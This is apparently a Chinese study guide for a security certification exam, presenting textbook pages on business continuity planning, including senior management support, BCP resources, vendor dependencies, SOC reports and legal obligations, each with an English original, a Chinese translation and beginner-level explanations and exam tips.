先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

IPS 放在线路中,误报可能影响可用性。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 07 / PDF P239

第 239 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

may devolve into destructive turf battles that derail the BCP effort and harm the organization as a whole.

中文直译 / 整理

可能演变为破坏性的地盘争夺战,从而偏离BCP工作并损害整个组织。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 239 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 08 / PDF P240

应有谨慎与尽职调查

一个偏采取合理行动,一个偏持续验证监督。

教材原文段落

Senior Management and BCP The role of senior management in the BCP process varies widely from organization to organization. It depends on the culture of the business, management interest in the plan, and the regulatory environment. Critical roles played by senior management usually include setting priorities, providing staff and financial resources, and arbitrating disputes about the criticality (i.e., relative importance) of services. One of the authors recently completed a BCP consulting engagement with a large nonprofit institution.

At the beginning of the engagement, he had a chance to sit down with one of the organization's senior executives to discuss his goals and objectives for their work together. During that meeting, the senior executive asked the consultant, “Is there anything you need from me to complete this engagement?” The senior executive must have expected a perfunctory response because his eyes widened when the consultant said, “Well, as a matter of fact…” The executive then learned that his active participation in the process was critical to its success. When working on a business continuity plan, the BCP team leader must seek and obtain as active a role as possible from a senior executive.

Visible senior-level support conveys the importance of the BCP process to the entire organization. It also fosters the active participation of individuals who might write BCP off as a waste of time that they might otherwise spend on operational activities. Furthermore, laws and regulations might require the active participation of those senior leaders in the planning process. If you work for a publicly traded company, you may want to remind executives that courts may find the officers and directors of the firm personally liable if a disaster cripples the business after they failed to exercise due diligence in their contingency planning.

You may also have to convince management that BCP and DRP spending are not discretionary expenses. Management's fiduciary responsibilities to the organization's shareholders require them to at least ensure that adequate BCP measures are in place. In the case of this BCP engagement, the executive acknowledged the importance of his support and agreed to participate. He sent an email to all employees introducing the effort and stating that it had his full

中文直译 / 整理

高级管理层与业务连续性计划 高级管理层在业务连续性计划(BCP)过程中的角色因组织而异,取决于 企业的文化、管理层对计划的兴趣以及监管环境。 高级管理层通常承担的 关键职责包括设定优先级、提供人员和财务资源,以及仲裁关于服务关键 性(即相对重要性)的争议。 其中一位作者最近完成了一项为大型非营利机构提供的BCP咨询服务。 在项 目开始时,他有机会与该机构的一位高级主管会面,讨论他们合作的目标与 期望。 在那次会面中,这位高级主管问顾问:"为了完成这项工作,您需要 我提供什么支持吗? " 这位高级主管可能预期得到一个敷衍的答复,因此当顾问说:"事实上......" 时,他睁大了眼睛。 随后,他意识到自己积极参与该过程对项目的成功至 关重要。 在制定业务连续性计划时,BCP团队负责人必须尽可能争取一位高级主管 的积极参与。 高层领导的可见支持向整个组织传递了BCP过程的重要性, 也有助于促使那些可能认为BCP是浪费时间、宁愿将其用于运营活动的人 员积极参与。 此外,法律法规可能要求这些高级领导者在规划过程中积极 参与。

如果您就职于一家上市公司,您不妨提醒高管们:如果灾难发生后 企业因未能在应急规划中尽到应有的审慎义务而遭受重创,法院可能会判 定公司高管和董事个人承担责任。 您可能还需要说服管理层,业务连续性计划(BCP)和灾难恢复计划( DRP)的支出并非可有可无的费用。 管理层对组织股东的受托责任要求他 们至少确保已采取充分的BCP措施。 在本次BCP合作中,该高管承认了其支持的重要性,并同意参与。 他向所 有员工发送了一封邮件,介绍该工作,并表示其完全支持

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:一个偏采取合理行动,一个偏持续验证监督。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“应有谨慎与尽职调查”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Due diligence 偏“确认事情被正确执行”。

BCP 保护业务流程,DRP 保护 IT 恢复。

RTO 是多久恢复,RPO 是能丢多少数据。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
学习单元 09 / PDF P241

第 241 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

backing. He also attended several of the high-level planning sessions and mentioned the effort in an organization-wide “town hall” meeting. Resource Requirements After the team validates the organizational review, it should turn to an assessment of the resources required by the BCP effort. This assessment involves the resources needed by three distinct BCP phases: BCP Development The BCP team will require some resources to perform the four elements of the BCP process (project scope and planning, business impact analysis, continuity planning, and plan approval and implementation).

It's more than likely that the major resource consumed by this BCP phase will be effort and time expended by members of the BCP team and the support staff they call on to assist in the development of the plan. BCP Testing, Training, and Maintenance The testing, training, and maintenance components of this phase of the BCP will require some hardware and software commitments. Still, once again, the major commitment in this phase will be the effort of the employees involved in those activities.

BCP Implementation When a disaster strikes and the BCP team deems it necessary to conduct a full-scale implementation of the business continuity plan, the implementation will require significant resources. Those resources include a large amount of effort (BCP will likely become the focus of a large part, if not all, of the organization) as well as direct financial expenses. For this reason, the team must use its BCP implementation powers judiciously yet decisively.

An effective business continuity plan requires the expenditure of significant resources, ranging from the purchase and deployment of redundant computing facilities to the pencils and paper used by team members scratching out the first drafts of the plan. However, as you saw earlier, personnel are one of the most significant resources consumed by the BCP process. Many security professionals overlook the importance of accounting for labor, but you can rest assured that senior management will not. Business leaders are keenly aware of the effect that time-consuming side activities have on the operational productivity of their organizations and the real cost 。

中文直译 / 整理

他还出席了多次高级规划会议,并在全公司范围的“全员大会”上提到了这 项工作。 资源需求 在团队完成组织审查后,应转向对业务连续性计划(BCP)工作所需资源 的评估。 此评估涉及BCP三个不同阶段所需的资源: BCP开发 BCP团队将需要一些资源来 p执行BCP的四个要素 p程( proj范围 pe 和 规划、业务影响分析、连续性规划以及计划审批与实施)。 在此BCP阶 段,最可能消耗的主要是BCP团队成员及其所召集的协助制定计划的支 持人员所投入的努力和时间。 BCP测试 g, 培训 g, 和维护 测试in g, 培训in g, 本阶段的业务连续性计划(BCP)的恢复和维护组件将需要一些硬件和软 件投入。 然而,再次强调,本阶段的主要投入将是参与这些活动的员工所 付出的努力。 BCP实施 当灾难发生且BCP团队认为有必要全面实施业务连续性计划时, 实施将需要大量资源。 这些资源包括大量的工作投入(BCP可能会成为组 织大部分甚至全部工作的重心)以及直接的财务支出。 因此,团队必须谨 慎而果断地运用其BCP实施权力。

一个有效的业务连续性计划需要投入大量资源,从购买和部署冗余计算设施到 团队成员在起草计划初稿时所使用的铅笔和纸张。 然而,正如您之前所见,人 员是BCP过程中消耗最多的资源之一。 许多安全专业人员忽视了核算人力成本 的重要性,但您完全可以相信,高层管理者绝不会忽视这一点。 商业领袖非常 清楚,耗时的辅助活动对其组织运营效率和实际成本的影响

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 241 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 10 / PDF P242

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

of personnel in terms of salary, benefits, and lost opportunities. These concerns become especially paramount when you are requesting the time of senior executives. You should expect that leaders responsible for resource utilization management will put your BCP proposal under a microscope, and you should prepare to defend the necessity of your plan with coherent, logical arguments that address the business case for BCP. Explaining the Benefits of BCP At a recent conference, one of the authors discussed business continuity planning with the chief information security officer (CISO) of a health system from a medium-sized U.S. city. The CISO's attitude was shocking.

His organization had not conducted a formal BCP process, and he was confident that an informal approach would work fine in the unlikely event of a disaster. This attitude is one of the most common arguments against committing resources to BCP. In many organizations, the attitude that the business has always survived, and the key leaders will figure something out in the event of a disaster, pervades corporate thinking. If you encounter this objection, you might want to point out to management the costs that will be incurred by the business (both direct costs and the indirect cost of lost opportunities) for each day that the business is down.

Then, ask them to consider how long a disorganized recovery might take when compared to an orderly, planned continuity of operations (COOP). Conducting a formal BCP effort is particularly important in healthcare organizations, where the unavailability of systems could have life-ordeath consequences. In October 2020, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert notifying healthcare organizations of an outbreak of ransomware activity specifically targeting their work. Strong continuity plans play an essential role in defending against these availability attacks.

中文直译 / 整理

体现在薪资、福利和机会损失方面。 当您需要占用高层管理人员的时间时, 这些关切尤其突出。 您应当预期负责资源利用的领导者 管理层会仔细审查您的业务连续性计划(BCP)提案,您应准备好用连贯、逻 辑严密的论据来证明您计划的必要性,这些论据需清晰阐述BCP的商业价值。 说明BCP的优势 在最近的一次会议上,其中一位作者与来自美国中等规模城市的某医疗系 统的首席信息安全部官(CISO)讨论了业务连续性规划。 这位CISO的态 度令人震惊:他的组织从未开展过正式的BCP流程,但他坚信,即使在极 不可能发生的灾难情况下,非正式的方法也足以应对。 这种态度是反对为BCP投入资源的最常见论点之一。 在许多组织中,普遍 存在一种观念:业务历来都能渡过难关,关键领导层在灾难发生时总会想 出办法。 如果您遇到这种异议,不妨向管理层指出,业务每中断一天,都 将产生直接成本和因机会丧失带来的间接成本。 然后,请他们思考,在与 有条不紊、经过规划的业务连续运营(COOP)相比时,无序的恢复可能 需要多长时间。 在医疗组织中开展正式的业务连续性计划(BCP)工作尤为重要,因为系统 不可用可能导致生死攸关的后果。

2020年10月,美国网络安全和基础设施 安全局(CISA)发布了一项警报,通知医疗组织其工作场所正遭受针对它 们的勒索软件活动爆发。 强大的连续性计划在防范这些可用性攻击方面发挥 着关键作用。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

CISO 需要足够独立性和高层支持。

ISO 偏标准和管理体系。

日志要保护完整性、时间同步和访问控制。

BCP 保护业务流程,DRP 保护 IT 恢复。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
首席信息安全官 CISO 负责组织安全计划、策略、沟通和监督。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 11 / PDF P243

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

External Dependencies When crafting a robust BCP, you need to understand and mitigate the risks associated with external dependencies. These dependencies range from technology vendors supplying critical hardware, software, and cloud services, to legal and regulatory frameworks that shape your operational landscape. Each external factor carries potential risks that could, if unaddressed, disrupt your business operations. Consequently, a comprehensive BCP doesn't just look inward at the organization's processes, but also outward, ensuring that external parties' roles and responsibilities are clearly understood and that contingency plans are in place to tackle any disruptions in these areas.

Vendors As you develop your BCP, it's crucial to consider the role of all technology vendors, not just those offering cloud services. These vendors, encompassing cloud service providers, hardware suppliers, and software developers, are integral to your organization's operational resilience. Their own business continuity arrangements can significantly impact your organization's ability to maintain business operations during disruptive incidents. Consider, for example, a firm that outsources email and calendaring to a third-party software-as-a-service (SaaS) provider.

Does the contract with that provider include details about the provider's service-level agreement (SLA) and commitments for restoring operations in the event of a disaster? Also, remember that a contract is not normally sufficient due diligence when choosing a vendor. You should also verify that the vendor has the controls in place to deliver on their contractual commitments. Although it may not be possible for you to physically visit the vendor's facilities to verify their control implementation, you can always do the next best thing—send someone else!

Now, before you go off identifying an emissary and booking flights, realize that many of your vendor's customers are probably asking the same question. For this reason, the vendor may have already hired an independent auditing firm to conduct an assessment of its controls. They can make the results of this assessment available to you in the form of a System and Organization Controls (SOC) report. We cover SOC reports in more detail in Chapter 15, “Security Assessment and Testing.” Keep in mind that there are three different versions of the SOC report. The simplest of these, a SOC 1 report, covers only internal controls over financial

中文直译 / 整理

外部依赖 在制定稳健的业务连续性计划(BCP)时,您需要了解并缓解与外部依赖相关 的风险。 这些依赖关系涵盖从提供关键硬件、软件和云服务的技术供应商,到 塑造您运营环境的法律和监管框架。 每个外部因素都可能带来潜在风险,若未 加以应对,将导致您的业务运营中断。 因此,一个全面的BCP不仅关注组织内 部的流程,还需向外审视,确保明确理解外部方的角色与责任,并制定应急计 划以应对这些领域可能出现的中断。 供应商 在制定您的业务连续性计划(BCP)时,至关重要的是考虑所有技术供应商的 作用,而不仅仅是提供云服务的供应商。 这些供应商包括云服务提供商、硬件 供应商和软件开发商,它们对贵组织的运营韧性至关重要。 它们自身的业务连 续性安排会显著影响贵组织在发生中断事件时维持业务运营的能力。 例如,考虑一家将电子邮件和日历服务外包给第三方软件即服务(SaaS)提供 商的公司。 与该提供商签订的合同是否包含了有关其服务级别协议(SLA)以 及在灾难发生时恢复运营的承诺的详细信息? 此外,请记住,在选择供应商时,合同通常不足以作为充分的尽职调查。 您还 应核实供应商是否具备履行其合同承诺的控制措施。

尽管您可能无法亲自访问 供应商的设施以验证其控制措施的实施情况,但您总可以采取次优的方案—— 派其他人去! 现在,在您开始识别使者并预订航班之前,请意识到您的供应商的许多客户可 能也在提出同样的问题。 因此,供应商可能已经聘请了一家独立的审计公司对 其控制措施进行评估。 他们可以以系统与组织控制(SOC)报告的形式向您提 供该评估结果。 我们将在第15章“安全评估与测试”中更详细地介绍SOC报告。 请记住,SOC 报告有三个不同的版本。 其中最简单的是 SOC 1 报告,仅涵盖财务 相关的内部控制

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

Due diligence 偏“确认事情被正确执行”。

网络题先定位层次,再判断协议、设备或攻击位置。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
学习单元 12 / PDF P244

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

reporting. If you want to verify the security, processing integrity, confidentiality, privacy, or availability controls, you'll want to review either a SOC 2 or a SOC 3 report. The American Institute of Certified Public Accountants (AICPA) sets and maintains the standards surrounding these reports to maintain consistency between auditors from different accounting firms. For more information on this topic, see the AICPA's document comparing the SOC report types at www.aicpa-cima.com/resources/landing/system-andorganization-controls-soc-suite-of-services.

Legal and Regulatory Requirements Many industries may find themselves bound by sector-specific, federal, state, and local laws or regulations that require them to implement various degrees of BCP. We've already discussed one example in this chapter—the officers and directors of publicly traded firms have a fiduciary responsibility to exercise due diligence in the execution of their business continuity duties. In other circumstances, the requirements (and consequences of failure) might be even more severe. Emergency services, such as police, fire, and emergency medical operations, have a responsibility to the community to continue operations in the event of a disaster.

Indeed, their services become even more critical in an emergency that threatens public safety. Failure to implement an effective BCP could result in the loss of life or property and decreased public confidence in the government. In many countries, financial institutions, such as banks, brokerages, and the firms that process their data, are subject to strict government and international banking and securities regulations. These regulations are necessarily strict because their purpose is to ensure the continued operation of the institution as a crucial part of the economy.

When pharmaceutical manufacturers must produce products in less-than-optimal circumstances following a disaster or in response to a rapidly emerging pandemic, they are required to certify the purity of their products to government regulators. There are countless other examples of industries that are necessary to continue operating in the event of an emergency by various laws and regulations. Even if you're not bound by any of these considerations, you might have contractual obligations to your clients that require you to implement sound BCP practices. If your contracts include commitments to customers expressed

中文直译 / 整理

报告。 如果您希望验证安全性、处理完整性、机密性、隐私性或可用性控制, 您需要审阅 SOC 2 或 SOC 3 报告。 美国注册会计师协会(AICPA)制定了这 些报告的相关标准,以确保不同会计事务所的审计师之间保持一致性。 有关此主题的更多信息,请参阅AICPA发布的比较SOC报告类型的文档: www.aicpa-cima.com/resources/landing/system-and-organization-controls-soc-suite-of-services。 法律和监管要求 许多行业可能受到特定行业、联邦、州和地方法律或法规的约束,这些法规要 求它们实施不同程度的业务连续性计划(BCP)。 我们已在本章中讨论过一个 例子——上市公司的高管和董事负有信托责任,必须在执行其业务连续性职责时 尽到应有的谨慎。 在其他情况下,要求(以及失败的后果)可能更加严格。 紧 急服务,如警察、消防和紧急医疗操作,有责任在灾难发生时继续为社区提供 服务。 事实上,在威胁公共安全的紧急情况下,他们的服务变得更加关键。 未 能实施有效的BCP可能导致生命或财产损失,并降低公众对政府的信任。

在许多国家,金融机构,如银行、经纪公司以及处理其数据的公司,都受到严 格的政府和国际银行与证券法规的约束。 这些法规之所以必须严格,是因为其 目的是确保这些机构作为经济关键组成部分的持续运营。 当制药制造商在灾难 后或应对迅速爆发的流行病时不得不在非理想条件下生产产品时,他们必须向 政府监管机构证明其产品的纯度。 还有无数其他行业,由于各种法律和法规的 要求,必须在紧急情况下继续运营。 即使您不受这些任何因素的约束,您也可能对客户负有合同义务,要求您实施 健全的业务连续性计划(BCP)实践。 如果您的合同中包含以

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

Due diligence 偏“确认事情被正确执行”。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
标准 标准给出必须满足的最低要求。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 13 / PDF P245

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

as service-level agreements (SLAs), you might find yourself in breach of those contracts if a disaster interrupts your ability to service your clients. Many clients may feel sorry for you and want to continue using your products/services, but their own business requirements might force them to sever the relationship and find new suppliers. On the flip side of the coin, developing a strong, documented business continuity plan can help your organization win new clients and additional business from existing clients.

If you can show your customers the sound procedures you have in place to continue serving them in the event of a disaster, they'll place greater confidence in your firm and might be more likely to choose you as their preferred vendor. That's not a bad position to be in! All of these concerns point to one conclusion—it's essential to include your organization's legal counsel in the BCP process. They are intimately familiar with the legal, regulatory, and contractual obligations that apply to your organization.

They can help your team implement a plan that meets those requirements while ensuring the continued viability of the organization to the benefit of all—employees, shareholders, suppliers, and customers alike. Laws regarding computing systems, business practices, and disaster management change frequently. They also vary from jurisdiction to jurisdiction. Be sure to keep your attorneys involved throughout the lifetime of your BCP, including the testing and maintenance phases. If you restrict their involvement to a pre-implementation review of the plan, you may not become aware of the impacts that changing laws and regulations have on your corporate responsibilities.

Business Impact Analysis Once your BCP team completes the four stages of preparing to create a business continuity plan (organizational review, BCP team selection, resource requirements, external dependencies), it's time to dive into the heart of the work—the business impact analysis (BIA). We approach the BIA in several stages: 1. Identifying priorities

中文直译 / 整理

服务等级协议(SLA)形式表达的客户承诺,一旦灾难中断了您服务客户的能 力,您可能会违反这些合同。 许多客户可能对您表示同情,并希望继续使用您 的产品/服务,但他们自身的企业需求可能迫使他们终止合作关系并寻找新的供 应商。 另一方面,制定一份强大且有据可查的业务连续性计划,可以帮助您的组织赢 得新客户,并从现有客户那里获得更多的业务。 如果您能向客户展示您在灾难 发生时持续为他们提供服务的健全流程,他们将对您的公司更有信心,并更有 可能选择您作为其首选供应商。 这可不是一个糟糕的处境! 所有这些担忧都指向一个结论——在业务连续性计划(BCP)过程中,必须让 贵组织的法律顾问参与其中。 他们对适用于贵组织的法律、监管和合同义务 了如指掌。 他们可以帮助您的团队制定一个既满足这些要求,又确保组织持 续运营的计划,从而惠及所有利益相关者——员工、股东、供应商和客户。 关于计算机系统、商业实践和灾难管理的法律法规经常变化,且因司法 管辖区而异。 请确保在业务连续性计划的整个生命周期中,包括测试和维护 阶段,都让律师持续参与。 如果您仅在计划实施前进行审查,可能会忽视法 律法规变化对您公司责任产生的影响。

业务影响分析 一旦您的BCP团队完成创建业务连续性计划的四个阶段(组织审查、BCP团队 选择、资源需求、外部依赖),就到了深入核心工作的时候——业务影响分析 (BIA)。 我们分以下几个阶段进行BIA: 1. 确定优先级

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

业务连续性计划 BCP:BCP 关注业务在灾难或中断中如何继续运行。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

BCP 保护业务流程,DRP 保护 IT 恢复。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 14 / PDF P246

第 246 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

2. Risk identification 3. Likelihood assessment 4. Impact analysis 5. Resource prioritization The BIA identifies the business processes and tasks that are critical to an organization's ongoing viability and the threats posed to those resources. It also assesses the likelihood that each threat will occur and the impact those occurrences will have on the business. The results of the BIA provide you with quantitative and qualitative measures that can help you prioritize the commitment of business continuity resources to the various local, regional, and global risk exposures facing your organization.

It's important to realize that there are two different types of analyses that business planners use when facing a decision: Quantitative Impact Assessment Involves the use of numbers and formulas to reach a decision. This type of data often expresses options in terms of the dollar value to the business. Qualitative Impact Assessment Takes non-numerical factors, such as reputation, investor/customer confidence, workforce stability, and other concerns, into account. This type of data often results in categories of prioritization (such as high, medium, and low). Quantitative assessment and qualitative assessment both play an essential role in the BCP process.

